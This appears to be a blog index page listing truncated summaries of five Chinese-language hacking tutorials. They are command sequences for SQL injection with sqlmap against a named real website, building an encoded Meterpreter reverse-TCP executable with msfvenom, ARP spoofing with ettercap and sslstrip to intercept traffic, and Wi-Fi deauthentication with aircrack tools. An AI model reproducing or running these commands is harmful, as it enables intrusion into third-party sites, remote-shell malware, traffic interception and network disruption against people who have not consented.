摘要: ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-us 阅读全文
posted @ 2019-03-19 11:53 sugarx 阅读(5416) 评论(0) 推荐(1) 编辑
摘要: 1.启动msfconsole命令模式2.msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe3.启动msfco 阅读全文
posted @ 2019-03-19 11:50 sugarx 阅读(4461) 评论(0) 推荐(0) 编辑
摘要: http:开启ip流量转发 echo 1 >>proc/sys/net/ipv4/ip_forward cat 查看文本arpspoof -i kali网卡 -t 目标ip 网关ettercap -Tq -i eth0 -Tq 启动文本模式 q 安静模式https:sslstrip 可以吧htts的 阅读全文
posted @ 2019-03-19 11:49 sugarx 阅读(1623) 评论(1) 推荐(0) 编辑
摘要: arpspoof -i kali网卡 -t 目标ip 网关ifconfig得到网关,网卡eth0 目标ip:192.168.216.131 网关:192.168.216.2 (ip route show)看局域网ip fping -asg 192.168.3.0/24获取图片arpspoof -i 阅读全文
posted @ 2019-03-19 11:48 sugarx 阅读(1411) 评论(0) 推荐(0) 编辑
摘要: 1.airodump-ng wlan02.找到合适的目标Ctrl+c停止3.复制目标网络的BSSID4.airodump-ng -c 6 --bssid 70:18:8B:DB:64:27 -w /root/Desktop/ wlan0 得到客户端5.再新开终端aireplay-ng --deaut 阅读全文
posted @ 2019-03-19 11:47 sugarx 阅读(1073) 评论(0) 推荐(0) 编辑